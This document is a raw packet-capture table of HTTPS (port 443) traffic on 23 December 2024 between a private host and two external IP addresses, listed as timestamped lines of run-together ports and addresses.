                                                                                                                                                                                        Dec 23, 2024 09:23:52.202394962 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202409983 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202415943 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.589313984 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:52.589359999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.589449883 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:52.589843035 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:52.589859962 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.015422106 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.015496969 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.029491901 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.029512882 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.030132055 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.031785011 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.079329014 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.505402088 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.548947096 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.548983097 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.549154043 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.549190044 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.549252987 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735034943 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735102892 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735130072 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735153913 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735163927 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735188007 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.735202074 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.784976959 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.785012960 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.785070896 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.785099030 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.785120010 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.792253971 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.792742014 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.792761087 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.833388090 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.897700071 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.897726059 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.897825956 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.897849083 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937278986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937370062 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937381983 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937412024 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937411070 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937431097 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.937470913 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964041948 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964106083 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964112043 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964143991 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964178085 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964219093 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.964230061 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990777016 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990859985 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990894079 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990904093 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990942955 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990961075 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990968943 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:54.990993977 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.036509037 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.036537886 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.083435059 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095540047 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095570087 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095601082 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095619917 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095638037 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095669031 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095669985 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095714092 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.095729113 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.096728086 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.098617077 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116391897 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116409063 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116437912 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116447926 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116494894 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116523981 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.116538048 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135257006 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135274887 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135307074 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135335922 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135365009 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135389090 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.135401011 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156713009 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156743050 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156783104 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156791925 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156838894 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156841993 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156851053 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156888962 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156902075 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.156953096 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174145937 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174196959 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174226999 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174237967 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174288034 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.174288034 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.176687002 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.192944050 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.192991972 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.193038940 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.193063021 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.193070889 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.211580038 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.211683035 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.211702108 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.211769104 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.214174986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.214529037 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.281924963 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.282005072 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.282082081 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.282094955 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.282121897 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.282135963 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.283701897 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.295217037 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.295280933 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.295299053 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.295319080 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.295332909 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.307600975 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.307681084 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.307693005 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.307754993 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.309117079 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.309222937 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320739031 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320775032 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320835114 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320835114 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320874929 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.320955992 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.331156015 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.331183910 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.331233025 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.331240892 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.331248999 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.337877035 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.337934017 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.337963104 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.337970972 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.338006973 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.344666004 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.344738960 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.344758987 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.344841003 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.345511913 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.345618010 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466236115 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466303110 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466376066 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466392994 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466409922 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466412067 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.466514111 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.472486973 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.472532034 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.472572088 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.472598076 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.472615004 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.478516102 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.478569031 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.478595972 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.478612900 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.478635073 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484591961 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484653950 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484675884 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484694958 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484730959 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.484765053 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490693092 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490712881 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490739107 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490842104 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490843058 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.490897894 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.497179985 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.497204065 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.497308969 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.497308969 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.497348070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.503071070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.503087044 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.503139019 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.503165007 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.503185034 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.509085894 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.509138107 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.509155035 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.509171963 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.509198904 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.552125931 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.552190065 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.598999977 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.660964966 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.660985947 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661020041 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661061049 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661099911 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661112070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661125898 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.661158085 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.666999102 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.667017937 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.667062044 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.667077065 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.667095900 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673074007 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673115969 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673141956 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673156023 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673172951 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.673197985 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679286957 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679302931 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679378986 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679397106 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679553032 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.679583073 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.685733080 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.685755014 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.685800076 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.685817003 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.685838938 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.691621065 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.691637039 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.691693068 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.691708088 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.697698116 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.697719097 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.697772026 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.697786093 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.697822094 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.755273104 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.755352974 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.802129984 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849673986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849689007 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849716902 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849725962 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849749088 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849754095 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849800110 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849829912 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.849874020 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.855921984 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.855936050 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.855952978 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.855994940 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.856004000 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.856044054 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.861860037 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.861896992 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.861921072 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.861927986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.861951113 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.867896080 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.867969036 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.867978096 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.868088007 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.868866920 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.868999958 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874804020 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874836922 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874878883 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874901056 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874921083 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874953032 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.874969006 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.880413055 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.880430937 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.880466938 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.880486012 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.880515099 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.886492014 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.886523008 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.886555910 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.886563063 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.886590004 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.892560005 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.892596960 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.892632008 CET49752443192.168.2.73.5.25.82
